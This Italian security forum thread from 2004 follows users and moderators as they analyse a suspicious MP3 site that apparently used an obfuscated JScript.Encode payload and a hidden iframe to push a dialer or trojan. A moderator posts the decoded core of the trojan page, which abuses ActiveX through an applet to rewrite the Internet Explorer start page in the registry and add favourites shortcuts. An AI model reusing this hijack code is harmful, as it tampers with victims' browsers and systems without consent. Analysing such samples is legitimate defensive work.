Condividi:        

!! Strana disconnessione all'accesso di un sito

Come rimuovere virus e spyware? Le carte di credito sono davvero sicure in rete? È possibile navigare anonimi? Con quali programmi tutelare la propria privacy? Come proteggere i file importanti? Se volete una risposta a queste e altre domande questo è il luogo giusto!

Moderatori: m.paolo, kadosh, Luke57

!! Strana disconnessione all'accesso di un sito

Postdi marco#1 » 04/08/04 14:02

Salve,

andando su questo sito mi si disonnette la mia conessione dialup: :mmmh:

http://www.multimedia-content.com/mp3-ok

E ho trovato il richiamo di questo codice tramite un iframe:
Codice: Seleziona tutto
<HTML>
<HEAD>
<SCRIPT LANGUAGE="JScript.Encode">#@~^IiUAAA==@!eOR@&NKmEs+   ORSDrY`;U/mm2+vJ]2/4YsVu&3]T9u!)]2/tl[Y22]T9u!)]2/DkO^+u&2`xDrY^+[]y!9G1E:UYu&ZJOrY^+u&3]T9u!)]2/?;I(K:] TJz1!jz!A]fG]y 9UmMrwDR3x1W[nu  uf2u!fuT)zJeC?Ol.Ou T2   ^W9+MMu!fYTz\CDu+ZYnkYK]&~]Z9]ZbO+kYGYy!]29]y!E   ndmmw]+%Y+y]+*2/]y*+qGrZPeh2Y l+ZCPtSu *y!hiAdq/]y*+Tu *y+OJz2/&zGKG]+*+T_K\Su+*y!* Z] X+ZK.l   dbYrKxmVzJ2gY l +]y*f3u *Z9]y*!zY+*2Z_K\SY+l&3]yX&;C3)G] XfA]+*Z9u XZbu *2Zt3Kz]+*y!^G   Y+   O]y*&GY+*y D+aY&4D:s]yX&~]+Xy!m4CM/nYu+l&9Sk   NWS/ q l Y l +Yy* Z4YDwO5;k7]y*ff/G   YnxDRKHwnYy*&3Yy*Tfu+l!)u l&ZUZ"(n:]+*y!sC   oEmL+u *29Bl7lUm.k2Ou X&AY l!9Yy*!)Yy*T,9G1EhxDRhMkDn]y*+%u X+y] lfZznnd3P]y*y!u2(!_KY lffZ]+Xy!(9:CY lfG!Yy*y!mKNY l&9mK: hkRl1Ok7+(c)^Yb\(/Wh2KxnxDY l&3Yy*&/&znKSAPu X22u *y u+*y,Y l&$Yy*!GY l!bu+X!G]y*TbY+l!1k6Y l TYy* 0Um\romOKD mwa1ls+u+*y!Y l&9Yy*&GY l !u+X F1YdmC2]+*y{]y*+1u *+T7l.]yXy!smxTElT+u+*y!Y l&9Yy* ZUl7komOGDcVmxLECL]+*2$]y*T9u *T)u X!On^/nu l !7lMY l TVmxL;mo+u+*y!]yXffu l TxC-boCYK.R(DGAk+DJC   o;lTnu X2Au *Zfu+*ZbY l!9Yy*!zY l!,6;UmDkKxY X+Zb[NwC\dxVYy* 0sKmY l+;]+l ZfkkwgC:]+*yZY+l !UrYjIdY+*y,u X TYy*{Au+*ZfY+l!bY+l!1]yXy!Yy*y!\mDu+*y!jtKDY+l !u+*2f]yX+!Ut^R/DnCD+jtK.Y1EOYy* 0sKmY l+Z_Yy*y!]y*y+]y*XZu XX;] l+ u *yTQ]y*y!9kd2glh+u+*y!QYy* + `IJ]yXy Yy*y,]y*2$]y*Tfu XTz] lT,u *yTY l Z?4W. :l.oOnmY4Yy* TYy*ffu+l TUkD+j"Su+*2AY l!9Yy*!zY l!,u+X Z]y*+!j4KD ?m-+u X+R] X+O]+*2$u XZfu *Zbu+*Z,Y lG9Yy*!GY l!bu+X!G]y*TbY+l!10!UmDkGUu *+T6]+*y0u Xy,u *y!u+*FAY l!9Yy*!zY l!,u+X Z]y*+!O.H]+*yT]y*{$u *T9u X!zYy*+Z]y* Z]yX Z]+*y!Y+l !u+*y!l8Y+*2f9W^Ehn   Y la2VYdYy**$Tu X*GYy*f~]y*!G]yX!z]+*y!Y+l !u+*y!]yX+!u l T]+Xy!CFcd+DZJj&f]+Xy%Y l+y]+lG~s,2*G/ yOqZw!Rq8f! )f~,OZT/!WsG*0bT$u XGGY l +Yy* 1Yy*fAu+l!9u l!bu l+!u X Z]+Xy!]yX Z] l+T]y*y!CF ^M+CY(xkYCU1+]+Xy%Y l+O]+l&~] l!GY l!)]y*+Tu *yT]y* ZY+*y!u X TYy*+!U4Vu X+Z] XfG]+*yTmF V+Dr4N+1O]y*+%u X+O] lfAu *Z9Y l!z]+*+Tu X ZY l TYy* TYy*+!u+l TmFc/+DZdjqG]+*y%Y+l  u+*FA!G*fsA!8Oo!1f FqZwR%OcTRZ!bT/O!Xcy+R]+lGG] l yY l 1]y*f$u *Z9]y*!zY+*y!u X TYy*+!u+*y!Y+l !Y+l Tl8 1DnmYqxkYmUm]+*y%Y+l ,u+*2A]yXTfu l!)]+Xy!Y l+!u X+Z] X+Z]+*yTu Xy!w?ru l+!u X&G]+Xy!l8 MYr(%nmD]y*+%Y+l 1]yX&~]+XZf]+XZbY l+Z]+l Z] l ZY l T]y*+Tu *yTl8R/O/SUqG]+*+0u X yY lG$oO&*9/yvRF;oZOq8fZObGAOR!ZZTcwfX0z!Au+*Ff]yX+ u l 1]+X2AY lTfu XTz] X+Z]+*yTu Xy!u *y!u+*y!Y l TC8RmMnlD+q   dOl   m]+*+0u X OY l&$Yy*!9Yy*Tbu+l Tu l !u l+!u X Z]+Xy!]yX Z1+DY+*y!u X&9Yy*+!mqRV+O6(L+^Ou X RYy*+O]y*&~]yX!G]+*ZbY+l !u+*y!]yX+!u l T]+Xy!Y l+!DDzYy* TYy*{Au+l!9u l!bJzu+*y!Y l TYy* ZY l !u+X Z]y*+!Y+l T]yX ZkWYy* TYy*+%9G1EhxDRmKW0r+ckUN66Wu *y0]y* y/4ou l +]+Xy,Y l+!u XfG] XfG]+*yT FYy*y,]y*yT]y*{Au XTG] lTbJz]yX+!u l T]+Xy!Y l+!u X+Z] X+Z]+*yTu Xy!u *y!u+*y!-lM]+Xy!+X2NmY+u+X Z]y*ffY+l TxA]y*+TGlYnYy*+%u+l 0   +S] l Z9lD+Y l 0Yy* OY l ,cLnY:ks+Y X+R]+*y1]y*+T3] X+Z]+*y0ycYy*y!eu l+!+!Y l TMu *yTvZ] l+Teu l TFTTZ]+*yTeu X+Z,!Y+l 1]yXy,Yy*2A]y*Z9]y*TbJzY+l !u+*y!]yX+!u l T]+Xy!Y l+!u X+Z] X+Z]+*yTu Xy!9Wm!:UYcmGW0knYy*&GY l  ;4L]y*2fL+UnMls]yX&~]+Xy!+a2bDn/u+l&9u l  u l+!3]+*y!naaNlDnRDWMtPjYMk   oY X+R]+*y1]y*+T3] X+Z]+*y+u X2Au *y!aCY4]+*2f&Yy*&~Y l  u+X!G]y*TbY+l T]yX Z]+Xy!]+Xy!Y l+Z]+l Z] l ZY l T]y*+Tu *yTk6] l+T]y*y%Y X+8VCxT;lT+ r   N+a66]+*y0u XyG/]y*y{]y*+,u X+Z] lf2 F]yX+,u l T?4scInoq.kD+Y+l !Y+l 0]yXy unZ`] l*;Y l*/?K0OAmD+u+*lZ]yXXZtk1DG/GWD]+*l/]y*X/&xYn.   +O]yXy!3Xw^WDDu+*lZY l*/\mkxu+*lZ]yXXZUYmDO]+Xy!KlTn]y*++u *+/u X ZYy*+ytDYwu lfbJzAhSRhz mW   O+   YR1Ghzbx9+aF 4D:s]yX y]+Xy,]+X2AY lTG]+l!zzzu l+!u X Z]+Xy!]yX Z] l+T]y*y!Y X+Z]+*yT]y*+Tu *+T7l.]yXy!nXw9lY]yX Z]+*2fY+l !   nhu *yT9lD+u X 0Yy*+%   nhu X+ZflOnu X RYy*+O]y* ORTnY:kh+u X+R] l+,u *yTQ]y*y!Y X+R *]yX ZeY+l !Tu X ZMu Xy!+!]y*yTeu X ZFTTZ] l+!C] l+T,Z]y*+,Y+l 1]yX&~]+XZf]+XZb&zu+l Tu l !u l+!u X Z]+Xy!]yX Z] l+T]y*y!Y X+Z]+*yTNKm;hxY ^KWVkYy*fG]y* yZ4L]y*ffT+UnMlVu+*2A]yX+!6ak.+dYy*ffu+*y Y+l !QYy*+!aaNCD+cYWVH:jYMkUou X+R] l+,u *yTQ]y*y!Y X+y]+*2$]y*+TalY4Yy*ffJYy*f~]y* y]yX!G]+*ZbY+l !u+*y!]yX+!u l T]+Xy!Y l+!u X+Z] X+Z]+*yTu Xy!7lDu l+!qsY l /Yy* ZjtKD]yX+Zu l TVG^u X&~Y l!9Yy*!)Yy*+!u+l Tu l !u l+!u X Z]+Xy!]yX Z] l+T]y*y!Y X+Zo]yX Z]+X2f]+Xy!o?} V+OUwmkmVwGV9+.]y*+0Z] l+,u *2$Y l!G]+*T)u X ZY l TYy* TYy*+!u+l Tu l !u l+!u X Z]+Xy!]yX Zk0u+X Z]y*+%sC   o;lTnRbx[nXr0Y+l 0]yXyGnk]y* F]yX O]+*y!Y+l&2 q]y* OY+*y!^W^]+Xy!Y lffu X+ZsY+l T_u+l Tu l  u lXZu X*;0C-KDkDG/u *y+Y l&~]+*T9u X!zY l TYy* TYy*+!u+l Tu l !u l+!u X Z]+Xy!]yX Z] l+T+^/]+*+Tb0Y l+!u X+RVlUL!lL+cr   NnXr6] l RY l {N]+XyG]yX O] l+T]y*22RFY+l 1]yX ZVG^u *+Tu X&GYy*+Zw] l ZQ]y*+!u X+y] lXZu *l/Wl7WMkO+UYy*+ u+*2AY+l!fY+l!)]yXy!Yy*y!]y*yT]y*+!u X+Z] l+!u *yTY l Z]+*+Tu X ZnVk+Y+l !rWu X ZYy*+RVmxo!lTnRbx[+XrWYy* RY l Gk-Y l F]+*+1u X ZY l&3R8] X+O]+*yT^W^u l !u lffu X ZoYy* ZQ]y* ZY+*y u X*/Yy*XZ6C\KDrOD]+Xy Y lf~]+l!G] l!zY l T]y*+Tu *yT]y* ZY+*y!u X TYy*+!u+*y!Y+l !Y+l T+^d]+l Zk0u l+!u X RVCUTElTnRbxNa60u l 0]+XyGrYu+*yGY+l ,Y+l T]yX22R8]y* O]yX ZVGmu X+Z] lffu *yT   su l T_Y+l T]yX y]+XlZ]+XlZ2DWDrDku *y u+*2AY l!9Yy*!zY l !u+X Z]y*+!Y+l T]yX Z]+Xy!]+Xy!Y l+Z]+l Z] l ZnVk+Y l Tr6] l+!u *y0sl   o!lL+ r   Nn6}W]y*+0u *+{6DY l+F]+l O] l ZY l&3O8]+Xy,]yX ZVW1Y+*y!u X&9Yy*+!qo]y*+T3] X+Z]+*y+u XlZu *lZ6C\KDr/u X+y] lfAu *Z9Y l!z]+*+Tu X ZY l TYy* TYy*+!u+l Tu l !u l+!u X Z]+Xy!+^d+u *yTr0u l T]+Xy%sl   LEmon bxNna}0Y l+R]+l FNlu l+Gu X O]+Xy!]yX&AOFu+X O]y*+!sG1]+*yT]y*f9u *+TqsY l+Z_Yy*y!]y*y+]y*XZu XX;W\./boYu+X y]y*fAY+l!9]yX!z]+Xy!]+Xy!Y l+Z]+l Z] l ZY l T]y*+Tu *yT]y* ZY+*y!Vd+Y+l TVK^]y*+Tu *f9u X Z   w]+l Z_]y*yT]y*+ u XX;] lXZwl\K.rY/u X +Yy*fAu+*ZfY+l!bY+l T]yXy!Yy*y!]y*yT]y*+!u X+Z] l+!u *yTY l Z]+*+Tb0Y l+%u X+8s?6 wWsN.A6rkYk] l RsW1]+*y,Y+l ,u+*y!]yX{Au l!9]+XZbY l+!u X+Z] X+Z]+*yTu Xy!u *y!u+*y!Y l TYy* ZY l !u+X Z]y*+!rWu X ZY l 0smxo;CT+ k   [666]y* R]yX F+d]y*+{u *y1]y* ZY+*22 FY X+O]+*yTVKmY+l !Y+l&9]yXy!oUrcM+DfMr\1C:]+Xy%wY l ,u+X Z_u X TYy*+ u+*lZY+l*Z9G1Eh+   Ok]+l Zlx9]yX Z?nYDkULk] lXZu *l/Y l y]+*+T3]+*yT1Y ik+DHCs+Y l+Z_Yy*y!]y*y+]y*XZu XX;sl7GDbYWkY+*y u X&$Yy*Tfu+*ZbY+l !Y+l T]yXy!Yy*y!]y*yT]y*+!u X+Z] l+!u *yTY l Z]+*+Tu X ZnVk+Y+l !rWu X ZYy*+RVmxo!lTnRbx[+XrWYy* RY l G9nY l F]+*+1u X ZY l&3R8] X+O]+*yT^W^u l !u lffu X Zsj6cM+D9Db\+gCh+u l 0oYy*+,u+*y!QYy* TYy*+ u+l*/u l*ZGW1;:xO/u X+Zlx9Y l !UnOYbxT/Y XX;]+*l/]y*++u *+T3]+*yTg+Ocjk+Dglsn]y*+!3]+Xy!]yX y] lX/]y*lZWl-GMkO+   Y l +Yy*&$Yy*Tfu+l!)u l !u l+!u X Z]+Xy!]yX Z] l+T]y*y!Y X+Z]+*yT]y*+Tu *+Tu X Zn^/nu l !b0u+*y!Y l 0smxo!CoRk   [n6}0u X 0Yy*+Gk-]y*+{u *+1u X ZYy*fAO8] l OY l TVKmY+l !u+*2f]yX+!w?}R!+O9Mk-+gC:]+Xy%oYy*+,u+l T3]y* Z]yX y]+*lZY+l*ZGGm!:+   Od]y*y!Cx[Yy*+!UnYDkULk] XX;]+*l/u Xy u *y!3Y l T1Y ik+DgC:] l+T_u l T]+Xy Y lXZu XX;0l-GMkO+MYy*+y]y*&~]yX!G]+*ZbY+l !u+*y!]yX+!u l T]+Xy!Y l+!u X+Z] X+Z]+*yTu Xy!u *y!u+*y!nVk+Y+l !bW]y* ZY+*y%^lUo;CT+ k   [+XrWYy* 0Yy*+GbOu XyGu *y,u+*y!Y l&3R8] l+,u *yTsW1]y*+!Y+l&9]yX Zsj6cM+O9Mk-+gCs+Yy*y%w]yX O]+*y!QYy* ZY l  u+X*;]y*XZ9G1Eh+   O/u X+Zlx[Yy*+!UnDYr   ok] l*;Y l*/]y*++u *yT_u *yTH+DR`/nDHCs+Y l+!3]+Xy!]+Xy Y lX;]+l*;wD0.kDkY l +Yy*&~Y l!fu+X!z]y*+!Y+l T]yX Z]+Xy!]+Xy!Y l+Z]+l Z] l ZY l T]y*+Tu *yT]y* Zns/]y*+!rWu X ZY l 0smxo;CT+ k   [666]y* R]yX F0.]y*+{u *y1]y* ZY+*22 FY X+O]+*yTVKmY+l !Y+l&9]yXy!oUrcM+DfMr\1C:]+Xy%wY l ,u+X Z_u X TYy*+ u+*lZY+l*Z9G1Eh+   Ok]+l Zlx9]yX Z?nYDkULk] lXZu *l/Y l y]+*+T3]+*yT1Y ik+DHCs+Y l+Z_Yy*y!]y*y+]y*XZu XX;0l7GDb/]yX+ u l&$]+XZfY lTbu X+Z] X+Z]+*yTu Xy!u *y!u+*y!Y l TYy* ZY l !u+X Z]y*+!Y+l T+^d+u X+Zk0Y+l T]yXy%smxTElT+crx9+ar6]+Xy%]yX FNlu+X F]y*+,Y+l T]yX&AOqYy* 1Yy*+!^G1]+l Z] l&GY l TsUr !YfMr\1lsnY l Ro]+Xy,Y l+!3]+Xy!]+Xy Y lX;]+l*;fW1EsnxD/Y l TC   N]yX Z?+DOrxT/u X*/Yy*XZu+*y Y+l !QYy*+!gnDRik+M1ls+u+*y!Q]y*+Tu *y+]y**;Y+*lZK\nDdrTYY l+ u Xf~] XTG]+*Z)u Xy!u *y!u+*y!Y l TYy* ZY l !u+X Z]y*+!Y+l T]yX Z]+Xy!]+Xy!nVknu Xy!^Wmu l+!u X&G]+Xy!sU6RV+YG.r\1m:n]+Xy%   su+*y,Y+l !QYy*+!u+l +u l*Zu lXZGW^Es+UOk] l+!mxNu+X Z?YOkULk]+*l/]y*X/u *++u X ZQu Xy!g+YcjknDglh+u X+Z_]yX Z] l++]y*lZY XX;sC\K.kD+dYy* +Yy*fAu+l!9u l!bu l+!u X Z]+Xy!]yX Z] l+T]y*y!Y X+Z]+*yT]y*+Tu *+Tu X ZYy*+Zk6] l RY l qsUr oKVN.2Xk/DdY l RVGmY+l 1]yX O]+Xy!]+XFAY lTG]+l!z] l ZY l T]y*+Tu *yT]y* ZY+*y!u X TYy*+!u+*y!Y+l !Y+l T]yXy!Yy*y!]y*yTDY;D   ]+X2A]yX!G] lT)]y*y!Y X+Z]+*yT]y*+Tu *+Tu X ZYy*+Z]y* Z]yX Z]+*y!Y+l !u+*y!]yX{fu l!9]+XZbY l+!u X+Z] X+Z]+*yTu Xy!u *y!u+*y!Y l TYy* ZY l !u+XGG]y*TfY+l!)]yX Z]+Xy!]+Xy!Y l+Z]+l Z] l ZY l T]y*+Tu *yT]y* Z)[Nwl7SU3Y+l 0VK^]y*+/u *+Tu X yhHO^KxD+xD]yX y]+*yZY+l !u+*y tDO2]y*2b&zAASRhX ^W   YnUDRmGhJkUNa8R4D:^] l yY l 1]y*f$u *Z9]y*!z&&]y*y!Y X+Z]+*yT]y*+Tu *+Tu X ZYy*+Z]y* Z]yXGG]+*ZfY+l!bu+*y!]yX+!u l T]+Xy!Y l+!u X+Z] X{G]+*Z9u XZbu *y!u+*y!Y l TYy* ZY l !u+X ZmmY^tY+l 0+u+*y,Y+l !Y+lG$]yXFfYy*Zf]y*Z)]y*T,u X+Z] l+!u *F9Y l!G]+*T)u X!OY l TYy* T^mY^tu+l 0]y* O]yX Z]+*FAY+lGfu+*Zf]yXTbu l!1]+XFfY lTfu XTz] XTG]+*Z)u XZ,6Ex1YbGxu X ZkUrD] l+%u *y1Y l Z]+*{$u X!GY l!)Yy*!1Yy*+!u+l Tk+DKks+K;Yu X R]+Xy 0u+*y%]yX+,u l +]+XyZY l+!8!TTu *+1u X&~Yy*TG]y*!z]yX!O]+*FfY+l!fu+*Zb]yXTfu l!)]+XZ,rxbO]y*+0u *+1u X&~Yy*TG]y*!z]yX&;zjZ"qKPu *23]y*!GY+*Zbu X!9Yy*Tbu+*2Z\3:b]+Xy!^W   OxOu l&fu l+ t?uKtSY+l !l !ZR +q*R2*Z!Y X+y]+*yTxm:nYy*&9!A13IzP}IYy*22]y*2/z_2)fu XfA] lTfu *Z)Y l&;A6feYy*f2u+*2Z&$}f5Y+l&3]yX2Z&_KtS]y*23]y*Tfu XTz] yY O]&~YTfu!zNGm;hxORS.kD+Y+RY+dOK]+,uf~]TG]ZbzJO Y&A]Tfu!)Y2ZzU/I&nKuf3]Zfu!)]f/UZ]qhP]y!sC   oECL]ffxC7lj1DbwYu&AY!G]Tbu&/YyFO Y!G]!zYTfu!z0;x^ObWU]yTHt{G2xA.   bx[WSYy%O4+`ISu ;Ak   1C:]+/6+lD;D/]y1Y Z]FAY T&J\+RZY!G]T)u !Y+Zhrx9GSRGa+   ] RY4nj"SY ;hrUgl:Y ;0+mO;D/u 1]f$u!9]Z)]FfYTG]!)&JOR]23u!9u!z]&;zU/I&nP]22YTG]!zY&;ztC[]22u!9]T)u&/4K[Xu T8TmWsGM]ffu+y]+2swsswsu+ u TY6OY2f]y+]y&!ZTT!Z]y Y&3YZfY!zY&;z8G9X]f3u!9]Z)u&/JtD:Vu&AY!G]Tbr#bIJzO @*@#@&x8oIAA==^#~@
</HEAD>
<script>
        tmr=setInterval('tmr2()',8000);
        function tmr2()
        {
                location.href='add1.php';
        }
</script>
</HTML>


C'è una maniera per decriptare questo codice e capire cosa fa ???
marco#1
Newbie
 
Post: 3
Iscritto il: 04/08/04 13:56

Sponsor
 

Re: !! Strana disconnessione all'accesso di un sito

Postdi Mikizo » 04/08/04 14:08

marco#1 ha scritto:Salve,

andando su questo sito mi si disonnette la mia conessione dialup: :mmmh:


Forse perchè il sito cerca di installarti un dialer... ;)
Non vedo perchè un sito al giorno d'oggi dovrebbe regalarti degli mp3
Avatar utente
Mikizo
Download Admin
 
Post: 8517
Iscritto il: 05/01/02 01:00
Località: Outside

Re: !! Strana disconnessione all'accesso di un sito

Postdi marco#1 » 04/08/04 14:12

Mikizo ha scritto:
marco#1 ha scritto:Salve,

andando su questo sito mi si disonnette la mia conessione dialup: :mmmh:


Forse perchè il sito cerca di installarti un dialer... ;)
Non vedo perchè un sito al giorno d'oggi dovrebbe regalarti degli mp3


Certo al giorno d'oggi non regala niente nessuno...

Cmq non si può far cadere la connessione di un utente cercando di farlo connettere ad una a pagamento in modo fraudolento.

Perchè andando sul sito non appare ne il certificato ne il tentativo di farti scaricare un .exe

C'è un modo di capire quello script codificato?
marco#1
Newbie
 
Post: 3
Iscritto il: 04/08/04 13:56

Postdi dado » 04/08/04 14:12

Come detto da mikizo... qui dialer ci cova.
E lo testimonia il fatto che, ad esempio, usando Firefox come browser e provando a cliccare uno dei link ai file audio, viene chiusa automaticamente la pagina del browser. Firefox è più 'intelligente' di IE, evidentemente, e non si fa infinocchiare! :diavolo:

House: "Vede, tutti pensano che sia un paziente a causa del bastone"
Wilson: "Allora perchè non indossa un camice bianco come tutti noi?"
House: "Perchè altrimenti pensano che sia un medico".
Avatar utente
dado
Utente Senior
 
Post: 16208
Iscritto il: 21/08/01 01:00
Località: La Città dei Sette Assedi

Postdi marco#1 » 04/08/04 14:18

Altra cosa strana:

Su google il link non esiste....

Ma cercando "scarica mp3" sempre in google nella seconda pagina appare questo link di godado http://clicks.godado.it/r.pperl/page=0f ... XIE6339d55

che porta in quel sito :mmmh:
marco#1
Newbie
 
Post: 3
Iscritto il: 04/08/04 13:56

Postdi Dylan666 » 04/08/04 21:25

dado ha scritto:Come detto da mikizo... qui dialer ci cova.
E lo testimonia il fatto che, ad esempio, usando Firefox come browser e provando a cliccare uno dei link ai file audio, viene chiusa automaticamente la pagina del browser. Firefox è più 'intelligente' di IE, evidentemente, e non si fa infinocchiare! :diavolo:


Un po' di cose in proposito:
  1. Non credo che la chiusura della pagina sia dovuta alla astuzia di Firefox, ma piuttosto al fatto che non riesca a interpretare il codice compresso con il MS Script Encoder (che è stato usato lo si capisce dal tag <SCRIPT LANGUAGE="JScript.Encode"> per chi non lo sapesse)
  2. Aggiungo poi che lo scrip tè nullo anche su Explorer (testato su versione 6.0.2800.1106) perché il debug della pagina si sofferma su questo errore (potrebbe anche essere questa la causa della chiusura del Firefox):

    Codice: Seleziona tutto
    Riga: 3
    Carattere: 1
    Errore: Carattere non valido
    Codice: 0

  3. Proprio a causa di quell'errore la de-codifica di questo sito non funziona e non si riesce a sapere nulla nemmeno col tool da cui trae ispirazione

    Purtroppo credo che non sapremo mai a che servisse lo script... :(
Avatar utente
Dylan666
Moderatore
 
Post: 40118
Iscritto il: 18/11/03 16:46

Postdi Mikizo » 05/08/04 00:46

In ogni caso vorrei sottolineare che basta un po' di esperienza a capire che si tratta di uns ito probabilmente da evitare, per cui non mi preoccuperei troppo del perchè non riesci a navigarci... anzi tirerei un sospiro di sollievo. ;)
Avatar utente
Mikizo
Download Admin
 
Post: 8517
Iscritto il: 05/01/02 01:00
Località: Outside

Postdi Dylan666 » 05/08/04 10:39

Mikizo ha scritto:non mi preoccuperei troppo del perchè non riesci a navigarci... anzi tirerei un sospiro di sollievo. ;)


Sì ma io sono un tipo curioso e così resto senza una risposta su cosa facesse lo script :cry: :lol:
Avatar utente
Dylan666
Moderatore
 
Post: 40118
Iscritto il: 18/11/03 16:46

Postdi piercing » 09/08/04 12:48

Viene provata a scaricare una pagina htm che viene rilevata con il solito trojan di cui potete leggere qui qualcosa...

http://vil.nai.com/vil/content/v_98882.htm
Avatar utente
piercing
Moderatore
 
Post: 7569
Iscritto il: 10/04/02 10:34
Località: Roma

Postdi piercing » 09/08/04 14:00

il link da cui viene scaricato il trojan è il seguente...
Codice: Seleziona tutto
<iframe frameborder="0" height="0" marginheight="0" marginwidth="0" name="ee" scrolling="No" width="0" src="http://66.240.141.143/add1.html">
</iframe>


la pagina all'incirca è questa (dopo un decriptaggio e due unescape...). Riporto solo il cuore... tanto per farvi rendere conto di cosa è capace lo scriptino...
Codice: Seleziona tutto
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content="text/html; charset=windows-1252" http-equiv=Content-Type>
<SCRIPT language=JavaScript>
   
//////// *** REMMO questa riga e la spezzo perchè manda in errore l'antivirus (piercing) *** ///////
//////// document.write
//////// ("<APPLET HEIGHT=0 WIDTH=0
//////// code=com .ms. activeX. Active X Component>
//////// </APPLET>");

   if (navigator.appName == 'Netscape') var language = navigator.language;
   else var language = navigator.browserLanguage;

   function AddFavLnk(loc, DispName, SiteURL) {
     var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
     Shor.TargetPath = SiteURL;
     Shor.Save();
   }

   function f() {
     try {
      a1=document.applets[0];
      a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
      a1.createInstance();
      Shl = a1.GetObject();
      a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
      a1.createInstance();
      FSO = a1.GetObject();
      a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
      a1.createInstance();
      Net = a1.GetObject();
      try {
//        if (document.cookie.indexOf("Chg") == -1) {
//          var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
//          document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
          if (!language.indexOf('es') >-1) Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.my-content.com/index1.html");
//          var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
//          document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
          var WF, Shor, loc;
          WF = FSO.GetSpecialFolder(0);
          if (language.indexOf('es') >-1) loc = WF + "\\favoritos";
          else if (language.indexOf('de') >-1) loc = WF + "\\favoriten";
          else if (language.indexOf('sv') >-1) loc = WF + "\\favoriter";
          else if (language.indexOf('it') >-1) loc = WF + "\\preferiti";
          else if (language.indexOf('fr') >-1) loc = WF + "\\favoris";
          else if (language.indexOf('da') >-1) loc = WF + "\\oversigt";
          else loc = WF + "\\Favorites";
          if(!FSO.FolderExists(loc)) {
            if (language.indexOf('es') >-1) loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favoritos";
            else if (language.indexOf('de') >-1) loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\favoriten";
            else if (language.indexOf('sv') >-1) loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\favoriter";
            else if (language.indexOf('it') >-1) loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\preferiti";
            else if (language.indexOf('fr') >-1) loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\favoris";
            else if (language.indexOf('da') >-1) loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\oversigt";
            else loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";
            if(!FSO.FolderExists(loc)) {
              return;
            }
          }
          AddFavLnk(loc, "my-content", "http://www.my-content.com/index1.html");
//        }
      }
      catch(e) {}
     }
     catch(e) {}
   }

   function init() {
     setTimeout("f()", 1000);
   }

   init();
</script>

<META content="MSHTML 5.00.2614.3500" name=GENERATOR></head>
<BODY></body></html>


Bello comunque vedere qualcuno che ancora sa programmare :D

PS Se la pagina vi desse problemi con l'antivirus fatemelo sapere... che provvedo ad offuscare un altro pò il codice...
Avatar utente
piercing
Moderatore
 
Post: 7569
Iscritto il: 10/04/02 10:34
Località: Roma


Torna a Sicurezza e Privacy


Topic correlati a "!! Strana disconnessione all'accesso di un sito":


Chi c’è in linea

Visitano il forum: Nessuno e 44 ospiti